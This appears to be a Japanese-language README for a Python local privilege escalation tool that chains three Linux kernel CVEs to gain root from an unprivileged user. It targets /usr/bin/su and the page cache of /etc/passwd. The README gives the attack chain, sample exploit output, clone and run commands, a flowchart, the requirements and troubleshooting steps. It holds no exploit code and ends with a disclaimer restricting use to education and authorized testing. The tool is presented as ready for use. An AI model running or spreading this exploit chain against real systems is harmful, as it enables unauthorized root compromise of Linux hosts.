
CVE-2026-43284 - CVE-2026-43500 - CVE-2026-46300 dirtyfragエクスプロイトの変種
Linuxカーネルの脆弱性に対するマルチCVEローカル権限昇格チェーン
uid=1000 → root(xfrm-ESP、RxRPC、Fragnesiaのページキャッシュ書き込み経由)
CVE-KERNEL は、複数のLinuxカーネルCVEを連鎖させ、非特権ユーザーからrootへ権限昇格するPythonベースのローカル権限昇格(LPE)ツールです。このエクスプロイトは、カーネルのネットワークサブシステムを通じてページキャッシュ破壊プリミティブを狙います。
MadExploitsによる改変 — UIの刷新、カラー化されたターミナル出力、エクスプロイトフロー表示の改善。
| CVE | ベクトル | ターゲット |
|---|---|---|
| CVE-2026-43284 | xfrm-ESP | /usr/bin/su バイナリの破壊 |
| CVE-2026-43500 | RxRPC + splice | /etc/passwd ページキャッシュへの書き込み |
| CVE-2026-46300 | Fragnesia (ESP-in-TCP) | skb_try_coalesce によるページキャッシュ書き込み |
/usr/bin/su または /etc/passwd が既に侵害されているかを確認su - でPTYシェルを起動esp4、esp6、rxrpc、CONFIG_ESPINTCP を検証CAP_NET_RAW を取得╔══════════════════════════════════════════════════════════╗
║ ║
║ Linux Kernel LPE Chains ║
║ CVE-2026-43284 | CVE-2026-43500 | CVE-2026-46300 ║
║ ║
║ Modified By MadExploits ║
║ ║
╚══════════════════════════════════════════════════════════╝
[*] Current user: uid=1000
── Exploit Chain ──
[ESP] Attempting to corrupt /usr/bin/su...
[+] Namespace created successfully
[*] (Full SU corruption requires XFRM SA setup - C only)
[RxRPC] Attempting to corrupt /etc/passwd...
[*] Current root entry: b'root:x:0:0:root:/root:/bin/b'
── Fragnesia (CVE-2026-46300) ──
[Fragnesia] Attempting CVE-2026-46300 exploit...
[+] ESP-in-TCP support detected
[+] User namespace created (CAP_NET_RAW acquired)
sudo modprobe esp4
sudo modprobe esp6
sudo modprobe rxrpc
lsmod | grep -E 'esp4|esp6|rxrpc'
git clone https://github.com/MadExploits/CVE-2026-46300.git
cd CVE-KERNEL
外部Python依存関係はありません — 標準ライブラリのみを使用します。
python3 main.py
| コード | 意味 |
|---|---|
0 | エクスプロイト成功、またはすでにroot |
1 | エクスプロイト失敗(パッチ適用済みシステム、またはモジュール不足) |
flowchart TD
A[Start] --> B{Already root?}
B -->|Yes| C[Spawn root shell]
B -->|No| D{Already patched?}
D -->|Yes| C
D -->|No| E[ESP - CVE-2026-43284]
E --> F[RxRPC - CVE-2026-43500]
F --> G{Patched?}
G -->|Yes| C
G -->|No| H[Fragnesia - CVE-2026-46300]
H --> I{Patched?}
I -->|Yes| C
I -->|No| J[Exploit failed]
XFRMセキュリティアソシエーションとユーザー名前空間の分離を介して /usr/bin/su を破壊します。XFRM netlinkソケットのセットアップが必要です(完全な実装はC言語)。
RxRPCキー操作と splice() / vmsplice() システムコールを通じて /etc/passwd ページキャッシュに書き込みます。
ESP-in-TCPの断片化パケットを介して skb_try_coalesce のバグを誘発し、ページキャッシュ書き込みプリミティブを実現します。
このリポジトリは Pythonの概念実証(PoC) を提供します。完全なエクスプロイトには、Cバージョンでのみ利用可能な低レベルシステムコールが必要です:
# Quick diagnostic
lsmod | grep -E 'esp4|esp6|rxrpc'
grep ESPINTCP /boot/config-$(uname -r)
cat /proc/sys/kernel/unprivileged_userns_clone
CVE-KERNEL/
├── main.py # Main exploit script (Python PoC)
└── README.md # Documentation
教育および許可されたセキュリティテストのみを目的としています
このツールは、教育目的、セキュリティ研究、および所有している、または明示的な書面によるテスト許可を得たシステムに対する許可されたペネトレーションテストのためだけに提供されます。
| 改変者 | MadExploits |
| CVE参照 | CVE-2026-43284 · CVE-2026-43500 · CVE-2026-46300 |
このプロジェクトは教育および研究目的で公開されています。自己責任で使用してください。
MadExploitsによる改変 · LinuxカーネルLPE研究
| 要件 | 説明 |
|---|
| OS | Linux (x86_64) |
| Python | 3.8 以上 |
| 権限 | 非特権ユーザー (uid ≠ 0) |
| カーネルモジュール | esp4、esp6、rxrpc(ロード可能) |
| カーネル設定 | CONFIG_ESPINTCP=y または =m |
| ユーザー名前空間 | 有効(/proc/sys/kernel/unprivileged_userns_clone) |
| 機能 | Python | C |
|---|
| ユーザー名前空間のセットアップ | ✅ | ✅ |
| パッチ検出 | ✅ | ✅ |
| RAWソケットトリガー | ✅ | ✅ |
| XFRM netlinkソケット | ❌ | ✅ |
| splice / vmsplice | ❌ | ✅ |
| AF_ALG暗号化操作 | ❌ | ✅ |
| RxRPCプロトコル処理 | ❌ | ✅ |
| 問題 | 解決策 |
|---|
ESP modules not loaded | sudo modprobe esp4 esp6 を実行 |
ESP-in-TCP not enabled | カーネルに CONFIG_ESPINTCP がない — 別のカーネルを使用 |
unshare failed | ユーザー名前空間を有効にするか、対応ディストリビューションで実行 |
RAW sockets require CAP_NET_RAW | ユーザー名前空間が有効であることを確認 |
| Exploit failed | システムがパッチ適用済みの可能性 — カーネルバージョンを確認 |